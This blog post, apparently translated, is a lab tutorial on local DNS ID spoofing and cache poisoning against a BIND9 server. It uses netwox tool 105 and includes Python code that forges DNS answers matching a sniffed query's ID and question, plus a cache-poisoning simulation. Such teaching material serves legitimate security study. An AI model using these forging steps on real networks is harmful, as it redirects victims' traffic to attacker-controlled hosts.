Principle and example of a local DNS attack

Posted by millikan at 2020-02-29

Author of this article: fi nation end. This article, together with the previous article "TCP session hijacking principle and test", earned a total reward of 20 yuan and a free invitation to join the knowledge planet.

DNS is the abbreviation of Domain Name System (also read as Domain Name Service). It consists of resolvers on the client side and name servers that hold or look up the records.

In short, when a user wants to reach a domain name, the machine first sends a query to its configured DNS server asking for the IP address of that name; this is DNS resolution. The server keeps a cache of recently resolved names and their IP addresses. If the requested name is in the cache, the cached address is returned directly. If it is not, the server forwards the query to other DNS servers (its upstream forwarder or, recursively, the root and authoritative servers), caches the answer it gets back, and returns it to the client.

From the above it is clear that the core of a DNS attack is to make the user receive a forged IP address. On a local network this can be done from two directions:

(1) Sniff the DNS query sent by the user, then deliver a reply containing a forged IP address to the user before the real DNS server's answer arrives (DNS ID spoofing).

(2) Exploit the fact that the DNS server always consults its local cache first, and plant a forged IP address for the target domain name in that cache (DNS cache poisoning).

Three virtual machines are used for the demonstration.

Virtual machine configuration:

Ubuntu DNS server: (running BIND9; search Baidu for installation instructions)

Ubuntu client:

Ubuntu attacker:

Attack tools: netwox (tool 105, driven through its netwag front end)


Configuration before the experiment:

On the client, edit the resolver configuration:

sudo vim /etc/resolv.conf

and add a line of the form (the address is the DNS server VM's IP):

nameserver <IP of the Ubuntu DNS server>

The DNS server is also pinned in the client's network configuration, so that the setting is not lost when /etc/resolv.conf is regenerated and the experiment runs smoothly.

Practical drill

DNS ID spoofing using a sniffer

When the attacker and the victim are on the same LAN and the user types a web address into a browser, such as , the user's machine sends a DNS query to its DNS server to resolve the host name to an IP address. When the attacker sniffs this query, it fabricates a fake DNS response. The fake response is accepted by the user's machine only if it meets the following criteria:

1. The source IP address must match the IP address the DNS query was sent to (the DNS server);

2. The destination IP address must match the source IP address of the DNS query (the user's machine);

3. The source UDP port must match the port the DNS query was sent to (usually port 53);

4. The destination UDP port must match the source port of the DNS query;

5. The UDP checksum must be correct (over IPv4 a checksum of zero, meaning "not computed", is also accepted);

6. The transaction ID must match the transaction ID of the DNS query;

7. The question section of the reply must match the question section of the query;

8. The domain name in the answer section must match the domain name that was queried;

9. The user's computer must receive the attacker's DNS response before the legitimate DNS response arrives.
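The following is an added example, not the netwox/netwag code used in the original article, showing what criteria 6 to 8 mean at the DNS message level: it parses a "sniffed" query, builds a forged answer that reuses the query's transaction ID and question section, and checks a candidate answer the way the victim's resolver would. The sniffed query is constructed here (www.example.com, transaction ID 0x1A2B) and the forged address 10.0.0.66 is a hypothetical attacker host. Only the DNS payload is built; the IP/UDP criteria 1 to 5 belong to the raw-socket sender, and criterion 9 is the race that being on the same LAN lets the attacker win.

```python
"""Forge a DNS answer that satisfies the message-layer acceptance criteria."""
import struct

A, IN = 1, 1                  # record type A, class IN
FLAG_RESPONSE = 0x8000        # QR bit in the flags word


def encode_name(name):
    # "www.example.com" -> 3 "www" 7 "example" 3 "com" 0
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def decode_name(msg, offset):
    """Decode a (possibly compressed) name; return (name, offset after it)."""
    labels, end, jumped = [], None, False
    while True:
        length = msg[offset]
        if length & 0xC0 == 0xC0:                        # compression pointer
            if not jumped:
                end = offset + 2
            offset = struct.unpack("!H", msg[offset:offset + 2])[0] & 0x3FFF
            jumped = True
            continue
        offset += 1
        if length == 0:
            break
        labels.append(msg[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels).lower(), end if jumped else offset


def build_query(tid, name, qtype=A):
    """Standard recursive query (flags 0x0100 = RD), as a stub resolver sends it."""
    return struct.pack("!6H", tid, 0x0100, 1, 0, 0, 0) + encode_name(name) + struct.pack("!HH", qtype, IN)


def parse_query(msg):
    tid = struct.unpack("!H", msg[:2])[0]
    qname, off = decode_name(msg, 12)
    qtype, qclass = struct.unpack("!HH", msg[off:off + 4])
    return {"id": tid, "qname": qname, "qtype": qtype, "qclass": qclass, "question": msg[12:off + 4]}


def forge_answer(query_msg, forged_ip, ttl=3600):
    """The attacker's reply: same ID and question as the query, one A record."""
    q = parse_query(query_msg)
    # flags 0x8180: response, recursion desired, recursion available, NOERROR
    header = struct.pack("!6H", q["id"], 0x8180, 1, 1, 0, 0)
    # answer RR: name is a pointer (0xC00C) to the question name at offset 12
    rr = struct.pack("!HHHIH", 0xC00C, A, IN, ttl, 4) + bytes(int(o) for o in forged_ip.split("."))
    return header + q["question"] + rr


def _records(msg):
    """Yield (name, type, class, ttl, rdata) for every RR in the answer section."""
    _, _, qd, an, _, _ = struct.unpack("!6H", msg[:12])
    off = 12
    for _ in range(qd):                                   # skip the question section
        _, off = decode_name(msg, off)
        off += 4
    for _ in range(an):
        name, off = decode_name(msg, off)
        rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        yield name, rtype, rclass, ttl, msg[off:off + rdlen]
        off += rdlen


def answer_matches_query(query_msg, answer_msg):
    """Criteria 6-8: transaction ID, question section and answer name must all match."""
    q = parse_query(query_msg)
    tid, flags = struct.unpack("!HH", answer_msg[:4])
    if not flags & FLAG_RESPONSE or tid != q["id"]:       # not a response, or wrong ID
        return False
    qname, off = decode_name(answer_msg, 12)
    if (qname,) + struct.unpack("!HH", answer_msg[off:off + 4]) != (q["qname"], q["qtype"], q["qclass"]):
        return False                                      # question section differs
    records = list(_records(answer_msg))
    return bool(records) and all(r[0] == q["qname"] for r in records)


def a_records(answer_msg):
    """IPv4 addresses carried in the answer section."""
    return [".".join(str(b) for b in rdata) for _, rtype, _, _, rdata in _records(answer_msg) if rtype == A]


SNIFFED_QUERY = build_query(0x1A2B, "www.example.com")   # constructed stand-in for the sniffed packet
FORGED_ANSWER = forge_answer(SNIFFED_QUERY, "10.0.0.66")  # what the attacker would send back

if __name__ == "__main__":
    print(FORGED_ANSWER.hex())
    print(answer_matches_query(SNIFFED_QUERY, FORGED_ANSWER), a_records(FORGED_ANSWER))
```

Note that the check is deliberately loose in the same way real stub resolvers are: nothing in the message authenticates the sender, so once the ID and question are copied from the sniffed query, winning the race is all that remains. This is exactly the work netwox tool 105 automates.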

Since conditions 1 to 8 can all be satisfied by copying fields from the sniffed query, the attacker only has to capture the victim's DNS query, build a matching fake response, and deliver it before the real DNS server does. netwox tool 105 ("sniff and send DNS answers") does both the sniffing and the replying; netwag is its graphical front end. Type netwag in a terminal to open it, then configure it as follows:

This setting specifies the domain name whose answers will be forged:

This setting specifies the forged IP address, i.e. the attacker's host:

Once configured, click the "run" button in the lower right corner. The tool listens for queries from the victim's machine to its DNS server and answers each one with its own forged packet, so after a short time the forged replies start to appear.


Opening the website on the victim shows that its original IP address has been replaced by the attacker's forged address, which means the DNS spoofing succeeded.

On the user's computer, the connection to the site now lands on the attacker's host, which shows that the IP redirection succeeded.

DNS cache poisoning attack

Log in remotely to the DNS server.

After obtaining root permission, run the following to flush the cache, dump it to disk and inspect the dump, so that the experiment starts from a known empty cache (the dump file name is set by the dump-file option in named.conf; the BIND default on Debian/Ubuntu is /var/cache/bind/named_dump.db):

# sudo rndc flush

# sudo rndc dumpdb -cache

# sudo cat /var/cache/bind/dump.db

In netwox, change the IP value to the address of the target DNS server (the resolver itself is now the victim) and change the mode to raw.

When the user requests resolution of the domain name , the DNS server finds no entry in its local cache and forwards the query to its upstream server. The attacker sniffs this outgoing query and sends a forged response back to the DNS server, which accepts and caches it. From then on every client query for that name is answered from the poisoned cache until the forged record's TTL expires.
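The following is an added example, not code from the original article, covering both the cache-first behaviour exploited in approach (2) and the poisoning step just described. It models a caching resolver such as the BIND server in the experiment with a simulated clock: the resolver answers from cache first, forwards a miss upstream, accepts the first reply whose transaction ID and name match the outstanding query, and discards anything that arrives afterwards. The names, addresses and TTLs are constructed for the example; 10.0.0.66 is the hypothetical attacker host.

```python
"""Why one forged upstream reply poisons every later client of a caching resolver."""
import random

ATTACKER_IP = "10.0.0.66"     # hypothetical attacker host
REAL_IP = "192.0.2.10"        # constructed stand-in for the legitimate answer


class CachingResolver:
    def __init__(self, clock):
        self.clock = clock      # callable returning the current time in seconds
        self.cache = {}         # name -> (ip, expiry time)
        self.pending = {}       # transaction id -> name of the outstanding upstream query
        self.outbound = []      # (tid, name) of queries sent upstream: what a LAN sniffer sees

    def client_query(self, name):
        """Return (ip, "cache") on a hit, or (None, "upstream") after sending a query."""
        entry = self.cache.get(name)
        if entry and entry[1] > self.clock():
            return entry[0], "cache"
        self.cache.pop(name, None)                 # expired entry, if any
        tid = random.getrandbits(16)               # randomised, but a sniffer on the LAN reads it
        self.pending[tid] = name
        self.outbound.append((tid, name))
        return None, "upstream"

    def upstream_reply(self, tid, name, ip, ttl):
        """Accept the reply only if it matches an outstanding query; the first one wins."""
        if self.pending.get(tid) != name:
            return False                           # unsolicited or mismatched: dropped
        del self.pending[tid]
        self.cache[name] = (ip, self.clock() + ttl)
        return True


def poisoning_scenario(name="www.example.com", forged_ttl=86400):
    """Replay the attack against the simulated resolver and report what each party sees."""
    now = [0]
    resolver = CachingResolver(lambda: now[0])
    result = {}
    # 1. the first client asks; the cache is empty, so the resolver queries upstream
    result["first_lookup"] = resolver.client_query(name)
    tid, qname = resolver.outbound[-1]
    # 2. the attacker, having sniffed tid and qname, answers before the real server
    result["forged_accepted"] = resolver.upstream_reply(tid, qname, ATTACKER_IP, forged_ttl)
    # 3. the genuine reply arrives later; no query is outstanding any more, so it is dropped
    result["real_accepted"] = resolver.upstream_reply(tid, qname, REAL_IP, 300)
    # 4. every later client is served the forged address straight from cache
    later = []
    for t in (1, 3600, forged_ttl - 1):
        now[0] = t
        later.append(resolver.client_query(name))
    result["later_lookups"] = later
    # 5. only when the forged TTL has expired does the resolver ask upstream again
    now[0] = forged_ttl + 1
    result["after_expiry"] = resolver.client_query(name)
    return result


if __name__ == "__main__":
    for key, value in poisoning_scenario().items():
        print(key, value)
```

The model shows why the attacker chooses a long TTL: one won race keeps the forged record in the cache, and in the experiment it would also show up in the output of rndc dumpdb -cache on the server. Randomised transaction IDs and source ports only defend against blind guessing from outside; against an attacker who can sniff the resolver's outgoing query, as here, they add nothing.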

On the user's computer, the name now resolves to the attacker's forged address, which shows that the cache poisoning attack succeeded.


A successful DNS attack can do great damage to the security of the user's information and property. Accessing important services directly by IP address does prevent DNS attacks, but at the cost of considerable inconvenience.

In this experiment a simple DNS attack was carried out under the condition that the local network can be sniffed. With nothing more than a single tool, the attacker achieves a large effect, which shows how important the security of the local network is.

Can DNS attacks also be mounted against hosts on a remote network? Naturally the answer is yes, but that first requires a deeper understanding of the contents of the DNS response packet. Watch for the following examples of remote DNS attacks. ^ ^